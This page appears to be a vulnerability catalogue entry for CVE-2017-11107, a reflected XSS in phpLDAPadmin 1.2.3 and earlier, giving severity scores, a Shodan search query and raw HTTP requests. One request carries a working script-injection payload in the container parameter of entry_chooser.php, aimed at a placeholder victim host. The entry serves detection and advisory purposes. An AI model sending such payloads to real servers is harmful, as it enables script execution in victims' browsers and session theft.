🔙 목록으로 돌아가기

CVE-2017-11107: phpLDAPadmin <= 1.2.3 - Reflected XSS

TitlephpLDAPadmin <= 1.2.3 - Reflected XSS
Author0x_Akoko
SeverityMedium
ImpactAttackers can execute malicious scripts in victim browsers, potentially leading to session hijacking or defacement.
RemediationUpdate to the latest version of phpLDAPadmin where the vulnerability is fixed.
CVSS Score6.1
EPSS Score0.00193
CVE IDCVE-2017-11107
CWE IDCWE-79
Shodan Queryhtml:"phpLDAPadmin"
Tags cve cve2017 phpldapadmin xss unauth

🔍 Vulnerability Description

phpLDAPadmin <= 1.2.3 contains a reflected cross-site scripting caused by unsanitized input in htdocs/entry_chooser.php via the form, element, rdn, or container parameter, letting attackers execute malicious scripts in victim browsers, exploit requires sending crafted input.

🌐 HTTP Request

GET /phpldapadmin/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /phpldapadmin/entry_chooser.php?container=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-11107.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-11107.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A